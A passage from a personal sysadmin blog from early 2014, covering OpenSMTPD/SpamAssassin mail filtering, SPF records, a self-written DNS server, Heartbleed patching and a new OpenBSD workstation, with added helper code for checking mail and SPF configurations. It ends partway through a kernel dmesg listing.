February 4th, 2014

Americas.centroid.eu is really unstable with OpenBSD, and I can't really afford it being down all the time. I'm going to put FreeBSD 10.0-RELEASE on it starting tomorrow, hoping FBSD will have a bit more stability. I'm going to have to port the mps software to FreeBSD... ouch.



After a long downtime my VPS americas is back

February 11th, 2014

After failing to install FreeBSD 10 on virtualbox (it cored in the installer)... I have requested a jail vps (basic plan) from hub.org. It took a few days but we're back online (for the blog at least). I'm very happy about this. I'm back running wildcarddnsd on the basic plan vps and I don't know why I had disabled it in the past, I can't remember. We'll have to see.



New naming scheme after planets

February 12th, 2014

I have 1 planet left to name, and that'll happen soon after the month of march. And then I'll be naming hosts after the greek alphabet. This will give me 24 possible names. I have a png from wikipedia here:

This is in my plans.



Security can be about Incentives

February 12th, 2014

Basically if the governments want a secure infrastructure they could offer incentives for companies to act accordingly. How does the government do that? By giving away money, for free, given a set of conditions.

Pretend the incentive is set for secure email in that the provider encrypts per SSL in and outgoing email, that's worth some money. If the provider also encrypts mailboxes that are used to store your mail so that even the administrators would be penalized in time if they snooped that would be another set of duckets.

If the provider installs anti-spoof filters, that's another incentive to give them money. And deflection attacks would be minimized. You can go further, VPN exchanges could be set up which are like Internet exchange points but they only pass ESP and IKE/Oakley. Networks that are interested in attaching to these exchange points will have to "peer" with their peers by exchanging crypto certificates and then their traffic is encrypted over the exchange point.

What else can you do? Governments could offer money incentives for people programming in secure Open Source software, and money incentives for people providing right patches to fix mistakes. An entire community of security professionals could thus in a non-binding manner make their living. It's an open market, no deadlines but no bullshit.

Think about it Mr. Politician.



SVPRadio.COM did get Media attention in 2012

February 13th, 2014

I recently found this article while googling for SVP Radio. Probably missed by many as it was new years, but worth the read anyhow. I was silly last night listening on SVP Radio until 4AM! Good times! svpradio.com.



Happy Valentines day!

February 14th, 2014

I got a new book for Valentines day. Written in the German language it is "Peer-to-Peer-Netzwerke" (P2P Networks) by Peter Mahlmann and Christian Schindelhauer. I have read a little bit in this book already and think it was worth the buy.



OpenSMTPD on FreeBSD with SpamAssassin

February 15th, 2014

Today the spam got to me in such a way that I wanted to try out a spam filter. I decided to work with spamassassin because I've never tried it before. SpamAssassin is a perl script that uses Bayesian filters to mark/tag a mail as spam when a certain score is reached.

So what I did was first bring my FreeBSD's mail jail up to speed. A portupgrade -af put everything installed from /usr/ports to the latest version.

Next I installed /usr/ports/mail/p5-Mail-SpamAssassin, I selected to not run as root which was recommended for some reason. Then I played a bit with amavisd and couldn't figure it out. Next I tried spampd which uses spamassassin and it worked right away. With a few tests I installed a new opensmtpd (which isn't the latest in the ports, I compiled it from an old snapshot, beware) configuration file and I'll share it with you:

listen on 10.3.2.1 port 25 tls certificate mail.solarscale.de auth-optional
listen on 2a01:4f8:d13:1980::25 port 25 tls certificate mail.solarscale.de auth-optional
listen on 127.0.0.1 port 10025 tag DESPAMMED

table aliases db:/usr/local/etc/aliases.db
table users db:/usr/local/etc/smtpusers.db

max-message-size 90000000

accept tagged DESPAMMED for domain "centroid.eu" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "galileo.solarscale.de" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "solarscale.de" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "io.solarscale.de" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "amdeutschhof.de" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "virgostar.net" virtual <users> deliver to mbox

accept for local alias <aliases> deliver to mbox

# domains in order
accept from any for domain "galileo.solarscale.de" alias <aliases> relay via smtp://127.0.0.1:10024
accept from any for domain "centroid.eu" virtual <users> relay via smtp://127.0.0.1:10024
accept from any for domain "solarscale.de" virtual <users> relay via smtp://127.0.0.1:10024
accept from any for domain "io.solarscale.de" virtual <users> relay via smtp://127.0.0.1:10024
accept from any for domain "amdeutschhof.de" virtual <users> relay via smtp://127.0.0.1:10024
accept from any for domain "virgostar.net" virtual <users> relay via smtp://127.0.0.1:10024

accept for any relay

And then in spampd I had the following config as read from /etc/rc.conf:

spampd_enable="YES"
spampd_flags="--user=spamd --group=spamd --host 127.0.0.1:10024 \
--relayhost=127.0.0.1:10025 --dose --tagall --auto-whitelist"

That was all I had to do. I've run a thousand test mails and have watched mail come in, the highest score I got was 3.4 out of 5.0, so not quite spam. But I'm sure I'll get a spam mail one of these days...
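
The configuration above sends each domain out to spampd on port 10024 and takes it back on port 10025 under the DESPAMMED tag, so every domain needs a rule on both sides. As an added example (not the author's code), this check lists domains that have the outbound rule but no tagged return rule; example.org and the function names are constructed for the illustration.

```shell
#!/bin/sh
# Added example: cross-check the filter loop in an smtpd.conf of the style above.

# domains_without_return_rule CONF
# Prints every domain that has a rule relaying to the filter on
# 127.0.0.1:10024 but no "accept tagged DESPAMMED" rule for the mail that the
# filter hands back on port 10025.
domains_without_return_rule() {
    awk '
        $1 == "accept" {
            dom = ""
            for (i = 2; i < NF; i++)
                if ($i == "domain") { dom = $(i + 1); gsub(/"/, "", dom) }
            if (dom == "") next
            if ($2 == "tagged" && $3 == "DESPAMMED")
                returned[dom] = 1
            else if (index($0, "relay via smtp://127.0.0.1:10024") > 0)
                filtered[dom] = 1
        }
        END { for (d in filtered) if (!(d in returned)) print d }
    ' "$1" | sort
}

# write_sample_conf FILE: rules for two of the post's domains plus one
# constructed domain (example.org) that is missing its tagged rule.
write_sample_conf() {
    cat > "$1" <<'EOF'
listen on 127.0.0.1 port 10025 tag DESPAMMED
accept tagged DESPAMMED for domain "centroid.eu" virtual <users> deliver to mbox
accept tagged DESPAMMED for domain "virgostar.net" virtual <users> deliver to mbox
accept from any for domain "centroid.eu" virtual <users> relay via smtp://127.0.0.1:10024
accept from any for domain "virgostar.net" virtual <users> relay via smtp://127.0.0.1:10024
accept from any for domain "example.org" virtual <users> relay via smtp://127.0.0.1:10024
accept for any relay
EOF
}

# Run the check on the constructed sample; it reports example.org.
conf=$(mktemp) && write_sample_conf "$conf" && domains_without_return_rule "$conf"
rm -f "$conf"
```

Pointing the function at the real smtpd.conf after adding a domain shows whether both halves of the loop were updated.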



New Computer, the decision factor

February 18th, 2014

In 2 months I'm buying a new computer. I plan on gathering a list on what I want and then ask a computer store to put it together for me. That's how I did Jupiter (computer) last. This new computer will be named Mercury. So far I have gathered these links:

Now this selection leaves a few questions. I know the Xeon is more powerful than the Core i7, and I don't need a graphics chip so I'll probably go with a Xeon. But is this CPU compatible with the SABERTOOTH mainboard I do not know. I've found a site that says they work together but that some functionality of the Xeon don't work. My question is.. would that make it more unstable? As far as storage and video card is concerned; I'll be reusing my SSD from Jupiter and also the graphics card, although when these people build my new Mercury I'll ask them to put an AMD/ATI card in there.

Mercury will be running the OpenBSD Operating System natively just like Jupiter did. I'm gonna try to put 32 GB of RAM in there. Jupiter only had 8 GB. Well here's to planning this computer. OBTW if I didn't get OpenBSD on the thing I'd try Linux or buy a Mac.



My Apartment: Year 1

February 19th, 2014

On February 13th, 2013 I moved in here. I don't regret moving here at all. It's a nice place. The setup that you see in the photo is pretty well what it is now, sans the G4 Cube which has been donated to the OpenBSD Project. Anyhow...



Upgraded my FritzBox Repeater 300E

February 20th, 2014

AVM, the manufacturer of routers and networking gear, has provided a fix for most of its products against a root exploit. My AVM Repeater 300E was also affected so I flashed its firmware. It took me 30 minutes after that trying to figure out why my network didn't work anymore. Turns out that the upgrade changed the MAC address of the repeater and network nodes behind it and I used static permanent ARP on my OpenBSD router. Hence nothing worked until I deleted the arp entry and updated it with a new one.



Win for the Consumer in Germany

February 25th, 2014

Consumers who have been locked in by their ISP to use a certain router don't have to comply with this anymore. Apparently the Bundesnetzagentur has made it law starting today that "Routerzwang" is not legal anymore. This is a win for the consumer in my eyes. Those ISPs that don't give up access data to their users are making themselves liable to be sued.



Purchased Reggae for March

February 26th, 2014

Two Albums because it's my birthday mid month. I have purchased:

  • Lutan Fyah - Life of a King
  • Queen Ifrica - Penthouse Flashback Series

Ok I'm going to listen to these now...on random.



First of March

March 1st, 2014

While officially still winter until the 20th, March here in Germany will bring us spring weather soon. I already exchanged winter coat for spring jacket last week. Is this a winter to remember? We had 2 snow days this winter season! I don't know and I think I'll forget about this winter next winter. Hoping for a bit of snow. I'm attaching my 4 seasons picture I made a few years ago.



How should we punish aggressors?

March 2nd, 2014

As I don't like politics too much I'll keep it short. Currently Ukraine is in crisis. It is my opinion that Russia is an aggressor. In my view the only way to de-conflict this is to put UN policing in Crimea. Preferably from South America as Russia would not want a NATO country that close probably.

I fear we may see the second iron curtain fall. And this shifts the ordering of the world once more. If the European Union protests by buying less natural gas it puts pressure on Russia. But we'd be screwed in Germany with our Energiewende ideal. Less natural gas would mean the nuclear power plants may live longer than we wanted. Keep thinking of Chernobyl though! It's a giant risk! And we should speed up the Energiewende at once, in order to have better odds down the road.

I will think of the Ukraine and give hope. Hope for a resolution! At the same time I hope for being worry free from war, we don't need war in Europe again! Peace!



Ordered two books from Amazon

March 3rd, 2014

I have ordered:

  • SQL Cookbook - Gennick, Jonathan
  • Redis in Action - Carlson, Josiah L.

I'm hoping to get more insights in these two databases.



What happened to *REAL* technical support?

March 4th, 2014

I have trouble getting IPv6 with my OpenBSD router through my provider. With an AVM router I was able to get it but not with OpenBSD, so I asked my provider:

My question:

Is the IPv6 implementation that M-net uses described anywhere? Since I swapped my router I no longer get IPv6 and I want to work my way into it.

ISP's answer:

Your connection is still assigned an IPv4 address. IPv6 is officially only available with our new contracts. You can, however, append @v6.mnet-online.de to the username. Please note that we cannot offer support for this option. It is the former IPv6 test system. Your router must also be IPv6-capable.

My second attempt:

Yes, it is. It just doesn't speak v6 over the PPPoE. Can you tell me which protocol is used to exchange the IPv6 configuration? Which standards or protocols described in RFCs are used?

ISP's answer:

IPv6 is the protocol. An IPv6-capable router should be able to establish the connection with the suffix mentioned. As already stated, we cannot provide support for this or information about the internal infrastructure.

The original exchange was in German. This conversation was akin to talking to a dead doorknob anyhow. What happened to RFC slinging technologists? They are not at my ISP unfortunately!



Viewable starsky tonight

March 8th, 2014

There is a bit of foggy skies but other than that I was able to see the following: Sirius, Orion, Gemini, Jupiter centered in Gemini between Castor and Pollux and just as much below them as that distance, Auriga and what seemed to be the half moon in Taurus, but I'd have to confirm that. I also saw Ursa Major on the other side of the house. It's a pity I couldn't get a picture, but I know now that on March 8th at 9:08PM the starsky is visible with those constellations towards the west.



March Equinox in 1 Week

March 13th, 2014

If you celebrate the equinox then you have one week to get ready. It is on Thursday, March 20th.



Happy Pi day!

March 14th, 2014

Happy Pi day. Although it's an American date format, we should be able to celebrate it worldwide. 03.14.14, just wait until next year it'll be more accurate at 03.14.15.



The case with consumer routers

March 14th, 2014

Consumer routers are inherently bad. Brands like AVM, D-Link, Speedport and Linksys come to my mind. AVM and D-Link recently had a security warning and those people using those routers should update their firmware. So what do I do? Well I'm somewhat in the same position as everyone else. I use an AVM router for LTE internet and I have a homebrew solution for my DSL connection.

I'd like to talk about this. I use a Soekris firewall for my DSL connected to an allnet dumb DSL modem. The soekris costs around 500 euros so it's not exactly cheap, but it gives freedom. You can run Linux, FreeBSD, NetBSD and OpenBSD on these and keep those operating systems up to date when patches come out. I view this as more stable and having more functionality than consumer routers. Other brands for similar routers are Alix, Lanner and Axiomtek. These are usually Atom based and have quite a bit of CPU power. And for all these there is ongoing support in the individual open source movements. However you do have to learn a little about firewalls (Pf for instance) to be able to restrict incoming traffic and do NAT. I often wonder why not more people are going this route.

I suspect we'll always have consumer routers pop up with problems until they are gotten rid of once and for all, because what does Internet mean to you? Is it worth 500 euros for a router and having peace of mind or is it worth just another throw-away product with a 29.95 a month Internet plan? Where is the seriousness there? And why are you using online banking with these? I don't use online banking btw. I've outlined options in this article for people to consider, but everyone make up your own minds.



As the world turns

March 19th, 2014

Currently there are world events no one foresaw just a few months ago. I'm considering letting my VPS in Hong Kong expire as the route to there may cross Russia's links. Before I was actually happy to take a non-NSA controlled route given the Snowden revelations. Now I may even consider a new VPS in the empire itself. Who knows, I'll make preparations for a new VPS in August at the latest. The VPS in HK had to be refurbished anyhow as it's running FreeBSD 8.4, moving the entire thing somewhere else may be just as much effort.



Spring has sprung!

March 20th, 2014

Today is the first day of spring. In about 6 hours as I write this is the equinox, precisely at 16:57 UTC according to wikipedia. Happy spring! Good bye winter!



I hunt Sysadmins

March 21st, 2014

"There's a man with a gun over there, Telling me I got to beware..", maybe these are familiar lyrics to you. They are from Buffalo Springfield. I kinda feel like this when I read this article. It's about the NSA and similar secret services targeting sysadmins. Not to get all frantic or anything.. why us? The reason is quite clear though. Then the other question is "who will protect us?" or "who watches the watchers?". Is it just doomed fate for every sysadmin to lose their cool and spend time in a mental institution? Because Internet warfare has casualties one might guess.



americas.centroid.eu upgraded to FreeBSD 10

March 26th, 2014

If you've experienced this blog not being reachable you could have tried:

  • emea.centroid.eu
  • ap.centroid.eu

to get the latest. But the commenting system was off. My VPS provider has now upgraded the jails to FreeBSD 10.0 and that included fixing my vps up. It took a day to get most things back in order.



Scaling back on donations this year

March 27th, 2014

I've become aware that I'm making a lot less than before because I'm getting paid in Canadian Dollars. This forces me to spend less and the first to go is donations. Mainly OpenBSD, I'm possibly going to give 50 euros more to make it 250 euros donated this year. FreeBSD will possibly not get a penny. This is also because I'm upset they changed their donor listings. Sorry.

If you're interested in the CADEUR trend check this yahoo.com currency calculator. Right now the CADEUR went up, but it's a long cry from May 2013 as seen on the 1 year range. C'mon CAD gain strength! And it would be nice if the euro was a bit weaker.



Oculus Rift, too bad

March 27th, 2014

Since May 15th, 2013 I've been writing about Oculus Rift. They've been acquired by Facebook. Too bad. I'm off their mailing list now and won't be all that interested anymore.



My C Primer hits 30,000 views

March 30th, 2014

In March 2014 my C Primer hit 30,000 views. It has slowed down a little bit.

  • January 2008, first draft
  • November 22, 2011 hits 10,000 views
  • November 10, 2012 hits 20,000 views
  • March 2014 hits 30,000 views

Thanks to all my readers who may also read my blog. The C Primer is found here.



I'm getting serious about new PC now...

March 30th, 2014

  • Intel Xeon E3-1280v3 CPU
  • 32 GB RAM (non-ECC) (Corsair?)
  • ASUS Z87WS Mainboard
  • 650 Watt S.V. (Coolermaster?)
  • 160 GB SSD (Intel)
  • Radeon Graphic Card
  • Blu Ray Disc Rewriter (LG?)
  • Computer case + keyboard

That's what I collected so far, next week I'm going to get a cost estimate.



Pre-Ordered OpenBSD 5.5

March 31st, 2014

From OpenBSD Europe. This year puffy is not wrapping back in time. The release song is found here. Thanks OpenBSD!



Happy 5th Anniversary Centroid.EU Blog!

March 31st, 2014

Although belated I'd like to make you aware that we surpassed the blog's 5th Anniversary on January 16th, 2014. Although the articles are missing until May 2009, they were once there. I had expired these but kept their article titles here.

The blog was always like a public diary to me. I just am not important enough to write about cool topics that are/aren't directly mine. Oh well. The history of centroid.eu is longer than even this though, but this is the longest I had centroid.eu in one piece. It expired once even before that, but before that I was going through some hard times and the seriousness of the blog wasn't there. Now it's pretty serious stuff IMO. I like writing in this blog and I hope to be writing for another 5 years in 2019! See you then!



Good Weather ahead?

April 2nd, 2014

I turned the heat off here at home, so I'm hoping the weather doesn't get cold again. Last year I spent over 8000 kWh and 80% for heating. Not ideal but perhaps the price in electricity will drop with all these "green" wind turbines and solar panels. Next year I'll spend less money on electricity as I'll heat my home a little less, it was too warm occasionally in my apartment last year.

In other news the local nuclear power plant Grafenrheinfeld has announced that it will shut its operation in May 2015. The reason they are saying this is that it is unable to compete on the energy market and it's not worth it any more. I think this is good news. I've been against this nuclear power plant almost since it began operation, see here.



Where would you hide?

April 4th, 2014

In nature there are always threats. I recently watched a documentary this weekend about the Great Dusky Swift which hides and sleeps behind waterfalls. This is a natural safe haven for the bird species, pretty ingenious.

In the mid 1990's I played an online BBS game called tradewars, where players trade, steal, and destroy each other. It was ANSI based and I even later attempted at creating a helper program for this at twh.centroid.eu, the helper sucks but what my favourite strategy was in that game was to check if a robot planet named ferrengal was cutting off the entrance to a tunnel sector. If yes then I'd shoot a photon torpedo into ferrengal to stun it and quickly move past it into this tunnel. Here I could build my home planets and have a safe haven to sleep. It was much like the Great Dusky Swift of South America choosing to sleep behind a waterfall.

I wonder what the future holds, are wormholes possible? And if so can one create a wormhole that is a sock? ie. it has no end? If that were possible then hiding in such a stretch of space-time would be like putting on a cloak. Spaceships that may come from other galaxies to study us may hide inside these "socks" and not worry about being seen at all. It is almost like hiding behind a waterfall... :-) in space.



Heartbleed, my story.

April 8th, 2014

A new 0-day vulnerability is making the rounds. The vulnerability works on both clients (Mozilla Firefox for instance) and servers (mail, web or anything that uses SSL/TLS with heartbeats). I saw some strangeness in my OpenBSD laptop on console as I was shutting it down, but luckily I have sandboxed the firefox to another user so it appeared to me like a permission denied error. It's possible someone wanted to read my $HOME/.ssh/id_rsa* files, this is why I implemented the running as another user in the first place.

So as mitigation I have applied patches to my OpenBSD workstations. Also I have turned off opensmtpd on my panama VPS which does a backup MX function. Until I have that fixed (possibly with help of the hoster) it won't be turned on again. All other versions of OpenSSL that I use are not affected.



My new Computer is ordered

April 11th, 2014

I have ordered my new computer today, this computer I'll call mercury.

  • Intel Xeon E3-1275v3 CPU
  • 4 x 8GB Kingston RAM
  • ASUS Z87-WS motherboard
  • SSD Intel 530 180 GB
  • Bluray DVD LG
  • Thermaltake 630W PS
  • Extra CPU cooler
  • Fractal Design 3000 towercase
  • Mouse and Keyboard
It came to 1429 euros, which I had budgeted above.



Wildcarddnsd has a YACC parser now!

April 13th, 2014

Yesterday before going to bed I committed my YACC parser for wildcarddnsd. Wildcarddnsd is my authoritative DNS Server that I programmed, it had a sloppy C based parse program before that. The YACC parser is great, I took parts from OpenSMTPD project and have thus added their license to the top of it (with my name added of course). The YACC parsing was mostly done by myself and the lex & yacc O'Reilly book that I had for at least a decade now. It should be noted that it took me 1 year almost to write this YACC file, I didn't work hard on it, but the logic of YACC did stall me at times.

So what's next for wildcarddnsd? I hope to be committing more YACC in the following months before the 0.9 BETA (should be in November). What we need is a way to put commandline options into the configfile, which is really simple now. Thanks for reading! :-) I'm pretty happy.



Wildcarddnsd now has configuration file options

April 15th, 2014

Not long after the YACC file was finished I have given the configuration file options that were only in the command line before. So I have moved these over. Here a small excerpt from the commit log message:

-b option == bind IP;
-i option == interface "lo0";
-n option == fork 2;
-p option == port 10034;
-l option == log;
This took me one hour to program approximately. The yacc configuration is great!



All my domains now have spf records

April 18th, 2014

I couldn't deliver to gmail anymore today. I think my parents spammed some day. Or someone with my identity from another server? After I had installed an spf record in the DNS system (TXT RR spf1) gmail would take my mail on again. This is what my SPF record looks like from the dns query program dig:

;; ANSWER SECTION:
centroid.eu.            84994   IN      TXT     \
"v=spf1 ip4:78.47.14.22 ip4:200.46.208.61 ip4:103.6.85.219 ip6:2a01:4f8:d13:1980::/64 ~all"
Any other than these IPv4 and IPv6 networks will get a softfail from now on. Probably a 4XX reply and no mail delivered. It's funny that gmail requires spf records now?
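
How a receiving mail server walks the record above for a connecting address, as an added example (not code from wildcarddnsd or from any mail provider). It handles only the ip4, ip6 and all mechanisms this record uses, and the function names are made up for illustration.

```c
#include <arpa/inet.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>

/* Illustrative only: the names below are hypothetical, not a real library's API. */

/* The TXT record shown in the dig output above. */
const char SPF_RECORD[] =
    "v=spf1 ip4:78.47.14.22 ip4:200.46.208.61 ip4:103.6.85.219 "
    "ip6:2a01:4f8:d13:1980::/64 ~all";

/* Compare the leading `bits` bits of two addresses. */
static int prefix_equal(const unsigned char *a, const unsigned char *b, int bits)
{
    int full = bits / 8, rest = bits % 8;
    unsigned char mask;

    if (memcmp(a, b, (size_t)full) != 0)
        return 0;
    if (rest == 0)
        return 1;
    mask = (unsigned char)(0xff << (8 - rest));
    return (a[full] & mask) == (b[full] & mask);
}

/* Does the network of an ip4:/ip6: mechanism ("addr" or "addr/len") cover sender?
 * Returns 1 or 0, or -1 if the mechanism itself is malformed. */
static int net_covers(int af, const char *spec, const char *sender)
{
    char buf[80], *slash, *end;
    unsigned char net[16], ip[16];
    int maxbits = (af == AF_INET) ? 32 : 128;
    long bits = maxbits;

    if (strlen(spec) >= sizeof(buf))
        return -1;
    strcpy(buf, spec);
    if ((slash = strchr(buf, '/')) != NULL) {
        *slash = '\0';
        bits = strtol(slash + 1, &end, 10);
        if (end == slash + 1 || *end != '\0' || bits < 0 || bits > maxbits)
            return -1;                  /* malformed prefix length */
    }
    if (inet_pton(af, buf, net) != 1)
        return -1;                      /* malformed network address */
    if (inet_pton(af, sender, ip) != 1)
        return 0;                       /* sender belongs to the other family */
    return prefix_equal(net, ip, (int)bits);
}

/*
 * Evaluate a record left to right; the first matching mechanism decides.
 * Returns "pass", "fail", "softfail", "neutral", "none" or "permerror".
 */
const char *spf_check(const char *record, const char *sender)
{
    char term[96];
    const char *p = record;
    size_t len;

    if (strncmp(p, "v=spf1", 6) != 0 || (p[6] != ' ' && p[6] != '\0'))
        return "none";                  /* not an SPF record */
    p += 6;
    for (;;) {
        const char *result = "pass";    /* default qualifier is '+' */
        const char *mech;
        int hit;

        p += strspn(p, " ");
        if (*p == '\0')
            return "neutral";           /* nothing matched and no "all" */
        len = strcspn(p, " ");
        if (len >= sizeof(term))
            return "permerror";
        memcpy(term, p, len);
        term[len] = '\0';
        p += len;

        mech = term;
        switch (*mech) {
        case '+': mech++; break;
        case '-': mech++; result = "fail"; break;
        case '~': mech++; result = "softfail"; break;
        case '?': mech++; result = "neutral"; break;
        }
        if (strcmp(mech, "all") == 0)
            hit = 1;
        else if (strncmp(mech, "ip4:", 4) == 0)
            hit = net_covers(AF_INET, mech + 4, sender);
        else if (strncmp(mech, "ip6:", 4) == 0)
            hit = net_covers(AF_INET6, mech + 4, sender);
        else
            return "permerror";         /* mechanism outside this example */
        if (hit < 0)
            return "permerror";
        if (hit)
            return result;
    }
}
```

Calling spf_check(SPF_RECORD, addr) with one of the listed hosts gives "pass"; any other address falls through to ~all and gives "softfail".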



SPF support in wildcarddnsd

April 21st, 2014

Happy Easter! I have programmed SPF support into wildcarddnsd just now. I hope I won't be leaving any easter eggs behind but if I do it's possibly pasted from the TXT functions, since SPF is TXT with a different RR# (99). I'll be moving this into production any time now.



Mercury (Computer) has arrived!

April 22nd, 2014

Here are the first pictures (more to follow)...

I am very proud right now :-).



More pictures of Mercury (Computer)

April 22nd, 2014

Here are more snapshots of Mercury, before I turn it on.





These were all made with my iPod.



Mercury (Computer) OpenBSD dmesg

April 23rd, 2014

I panicked a little last night. OpenBSD in -current out of the box with no patches isn't ready for it yet. Luckily an OpenBSD developer helped me with patches that made the wd0 drive (in IDE mode) work. Here then is a patched dmesg:

OpenBSD 5.5-current (GENERIC.MP) #0: Wed Apr 23 10:04:36 CEST 2014
    pjp@jupiter.centroid.eu:/usr/src/sys/arch/amd64/compile/GENERIC.MP
real mem = 34006806528 (32431MB)
avail mem = 33092829184 (31559MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.7 @ 0xe9950 (91 entries)
bios0: vendor American Megatrends Inc. version "1504" date 10/04/2013
bios0: ASUS All Series
acpi0 at bios0: rev 2
acpi0: sleep states S0 S3 S4 S5
acpi0: tables DSDT FACP APIC FPDT LPIT SSDT SSDT MCFG HPET SSDT SSDT BGRT
acpi0: wakeup devices PXSX(S4) RP01(S4) PXSX(S4) RP02(S4) PXSX(S4) RP03(S4) PXSX
(S4) RP04(S4) PXSX(S4) RP05(S4) PXSX(S4) RP06(S4) PXSX(S4) RP07(S4) PXSX(S4) RP0
8(S4) [...]
acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpimadt0 at acpi0 addr 0xfee00000: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz, 3604.71 MHz
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,\
MWAIT,DS-CPL,VMX,SMX,EST,TM2,SSSE3,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1,SSE4.2,\
x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE,LONG,LAHF,ABM,\
PERF,ITSC,FSGSBASE,BMI1,HLE,AVX2,SMEP,BMI2,ERMS,INVPCID,RTM
cpu0: 256KB 64b/line 8-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: Pentium Pro MTRR support, 10 var ranges, 88 fixed ranges
cpu0: apic clock running at 102MHz
cpu0: mwait min=64, max=64, C-substates=0.2.1.2.4, IBE
cpu1 at mainbus0: apid 2 (application processor)
cpu1: Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz, 3604.30 MHz
cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,\
MWAIT,DS-CPL,VMX,SMX,EST,TM2,SSSE3,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1,\
SSE4.2,x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE,LONG,\
LAHF,ABM,PERF,ITSC,FSGSBASE,BMI1,HLE,AVX2,SMEP,BMI2,ERMS,INVPCID,RTM
cpu1: 256KB 64b/line 8-way L2 cache
cpu1: smt 0, core 1, package 0
cpu2 at mainbus0: apid 4 (application processor)
cpu2: Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz, 3604.30 MHz
cpu2: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,\
MWAIT,DS-CPL,VMX,SMX,EST,TM2,SSSE3,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1,SSE4.2,\
x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE,LONG,LAHF,ABM,\
PERF,ITSC,FSGSBASE,BMI1,HLE,AVX2,SMEP,BMI2,ERMS,INVPCID,RTM
cpu2: 256KB 64b/line 8-way L2 cache
cpu2: smt 0, core 2, package 0
cpu3 at mainbus0: apid 6 (application processor)
cpu3: Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz, 3604.30 MHz
cpu3: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,\
MWAIT,DS-CPL,VMX,SMX,EST,TM2,SSSE3,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1,SSE4.2,\
x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE,LONG,LAHF,ABM,\
PERF,ITSC,FSGSBASE,BMI1,HLE,AVX2,SMEP,BMI2,ERMS,INVPCID,RTM
cpu3: 256KB 64b/line 8-way L2 cache
cpu3: smt 0, core 3, package 0
cpu4 at mainbus0: apid 1 (application processor)
cpu4: Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz, 3604.30 MHz
cpu4: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,\
MWAIT,DS-CPL,VMX,SMX,EST,TM2,SSSE3,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1,SSE4.2,\
x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE,LONG,LAHF,ABM,\
PERF,ITSC,FSGSBASE,BMI1,HLE,AVX2,SMEP,BMI2,ERMS,INVPCID,RTM
cpu4: 256KB 64b/line 8-way L2 cache
cpu4: smt 1, core 0, package 0
cpu5 at mainbus0: apid 3 (application processor)
cpu5: Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz, 3604.30 MHz
cpu5: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,\
MWAIT,DS-CPL,VMX,SMX,EST,TM2,SSSE3,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1,SSE4.2,\
x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE,LONG,LAHF,ABM,\
PERF,ITSC,FSGSBASE,BMI1,HLE,AVX2,SMEP,BMI2,ERMS,INVPCID,RTM
cpu5: 256KB 64b/line 8-way L2 cache
cpu5: smt 1, core 1, package 0
cpu6 at mainbus0: apid 5 (application processor)
cpu6: Intel(R) Xeon(R) CPU E3-1275 v3 @ 3.50GHz, 3604.30 MHz
cpu6: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,\
PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,\
MWAIT,DS-CPL,VMX,SMX,EST,TM2,SSSE3,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1,SSE4.2,\
